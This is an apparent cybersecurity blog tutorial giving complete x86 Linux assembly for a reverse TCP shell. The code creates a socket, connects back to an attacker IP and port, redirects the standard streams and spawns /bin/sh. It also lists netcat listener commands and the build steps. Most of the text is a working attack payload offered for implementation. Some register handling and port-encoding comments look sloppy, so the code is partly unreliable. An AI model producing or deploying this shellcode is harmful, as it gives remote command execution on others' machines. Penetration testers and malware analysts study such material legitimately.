Reverse TCP Shell in x86 Assembly: A Deep Dive

By /

Listen to this Post

Featured Image
Creating a Reverse TCP Shell in x86 Assembly is a challenging yet rewarding task for low-level programming and cybersecurity enthusiasts. Below, we break down the key components and provide practical code snippets to help you understand and implement this technique.

You Should Know: Key Components of a Reverse TCP Shell in x86 Assembly

1. Socket Creation (Linux x86)

A TCP reverse shell requires socket programming. Here’s how to create a socket in x86 Assembly:

section .text 
global _start

_start: 
; Create socket (sys_socket call) 
xor eax, eax 
xor ebx, ebx 
xor ecx, ecx 
mov al, 0x66 ; sys_socketcall 
mov bl, 0x1 ; SYS_SOCKET 
push ecx ; Protocol (0) 
push 0x1 ; SOCK_STREAM 
push 0x2 ; AF_INET 
mov ecx, esp ; Pointer to args 
int 0x80 ; Syscall 
mov esi, eax ; Save socket fd

2. Connecting to the Attacker (Reverse Shell)

After socket creation, connect to the attacker’s IP and port:

; Connect (sys_connect) 
mov al, 0x66 ; sys_socketcall 
mov bl, 0x3 ; SYS_CONNECT 
push 0x0101017F ; IP (127.1.1.1 in reverse) 
push word 0x901F ; Port 8080 (0x1F90 in network byte order) 
push word 0x2 ; AF_INET 
mov ecx, esp ; struct sockaddr 
push 0x10 ; socklen_t addrlen 
push ecx ; sockaddr addr 
push esi ; sockfd 
mov ecx, esp ; Pointer to args 
int 0x80
  1. Redirecting STDIN, STDOUT, STDERR to the Socket

To interact with the shell, duplicate file descriptors:

; Dup2 for stdin, stdout, stderr 
xor ecx, ecx 
mov cl, 0x3 ; Loop counter (0,1,2) 
mov ebx, esi ; sockfd 
dup_loop: 
dec ecx 
mov al, 0x3F ; sys_dup2 
int 0x80 
jnz dup_loop

4. Executing `/bin/sh`

Finally, spawn a shell:

; Execve /bin/sh 
xor eax, eax 
push eax 
push 0x68732F2F ; "hs//" 
push 0x6E69622F ; "nib/" 
mov ebx, esp ; Pointer to "/bin//sh" 
push eax 
push ebx 
mov ecx, esp ; argv 
mov edx, eax ; envp (NULL) 
mov al, 0xB ; sys_execve 
int 0x80

What Undercode Say

Writing a Reverse TCP Shell in x86 Assembly requires deep knowledge of system calls, network programming, and low-level execution flow. This technique is often used in exploit development and cybersecurity research.

Additional Useful Commands for Cybersecurity Practitioners

  • Linux Networking: 
    nc -lvnp 8080  Listener for reverse shell 
strace ./shell  Debug syscalls 
objdump -d shell.bin  Disassemble binary
  • Windows Equivalent (PowerShell): 
    nc.exe -lvp 8080
  • Assembly Compilation: 
    nasm -f elf32 shell.asm -o shell.o 
ld -m elf_i386 shell.o -o shell

Expected Output:

A functional reverse shell that connects back to the attacker’s machine when executed, allowing remote command execution.

This article provides a hands-on approach to understanding and implementing Reverse TCP Shells in x86 Assembly, a crucial skill for penetration testers and malware analysts.

References:

Reported By: Kavinarasue I – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: